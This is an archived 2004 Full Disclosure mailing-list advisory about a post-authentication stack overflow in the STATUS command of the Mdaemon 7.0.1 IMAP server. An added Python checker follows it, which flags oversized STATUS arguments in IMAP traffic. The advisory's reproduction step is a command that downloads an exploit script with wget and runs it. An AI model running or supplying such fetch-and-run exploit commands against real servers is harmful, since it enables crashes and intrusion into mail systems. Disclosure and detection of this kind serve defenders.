Full Disclosure mailing list archives

Mdaemon 7.0.1 IMAP overflow.


From: ned <nd () felinemenace org>
Date: Tue, 11 May 2004 22:26:13 -0700 (PDT)

Let it be known that this bug is after authentication ("postauth") and 
therefore useless.

In the current version of Mdaemon from ALTN there exists an easy to 
exploit, run-of-the-mill stack overflow.

By authenticating and sending a large argument to the STATUS command in 
the IMAP component, a buffer will be overflowed, and an access violation 
will be caused.

To reproduce:
cd SMUDGE; wget http://felinemenace.org/~nd/SMUDGE/Mdaemon/Mdaemon7.0.1Stack.py; python Mdaemon7.0.1Stack.py

Change the user and password first.

Thanks to:
- Dave Aitel for his neat spike scripts which convert to SMUDGE scripts 
quite easily :)
- rootkit.com

Not sure if the vendor knows about it.

Thanks,
nd

ps: second public release from the UBC, we have to make space for the new 
vulns :)
-- 
http://felinemenace.org/~nd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
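
A defensive check for the condition described in the post, as an added example that is not part of the original message: it measures the mailbox argument of IMAP STATUS commands in captured client lines and flags oversized ones. The 255-byte limit, the function names and the sample lines are assumptions constructed for illustration; the post itself gives no size.

```python
import re

# Assumed policy limit: the post only says "large", so this value is a choice.
MAX_MAILBOX_LEN = 255

# RFC 3501 command framing: tag SP "STATUS" SP mailbox SP "(" items ")"
_STATUS = re.compile(rb'^(\S+) +STATUS +(.*)$', re.IGNORECASE | re.DOTALL)
# Literal prefix {n} or non-synchronizing {n+}; the data follows on later lines.
_LITERAL = re.compile(rb'^\{(\d+)\+?\}')


def status_mailbox_len(line: bytes):
    """Return (tag, mailbox_length) for a STATUS command, else None."""
    m = _STATUS.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    tag, rest = m.group(1), m.group(2)
    lit = _LITERAL.match(rest)
    if lit:                        # literal: the client announces the size
        return tag, int(lit.group(1))
    if rest.startswith(b'"'):      # quoted string with backslash escapes
        i, n = 1, 0
        while i < len(rest) and rest[i:i + 1] != b'"':
            if rest[i:i + 1] == b'\\':
                i += 1             # skip the escape character itself
            i += 1
            n += 1
        return tag, n              # an unterminated quote counts in full
    return tag, len(rest.split(b" ", 1)[0])   # atom ends at first space


def flag_oversized(lines, limit=MAX_MAILBOX_LEN):
    """Return [(tag, length)] for STATUS commands whose mailbox exceeds limit."""
    hits = []
    for line in lines:
        parsed = status_mailbox_len(line)
        if parsed and parsed[1] > limit:
            hits.append(parsed)
    return hits


# Constructed sample of client-to-server lines (not taken from the post).
SAMPLE = [
    b'a001 NOOP\r\n',
    b'a002 STATUS INBOX (MESSAGES UNSEEN)\r\n',
    b'a003 STATUS "' + b'A' * 600 + b'" (MESSAGES)\r\n',
    b'a004 status {4096}\r\n',
    b'a005 STATUS "Sent Items" (RECENT)\r\n',
]

if __name__ == "__main__":
    for tag, length in flag_oversized(SAMPLE):
        print(tag.decode(), "STATUS mailbox argument of", length, "bytes")
```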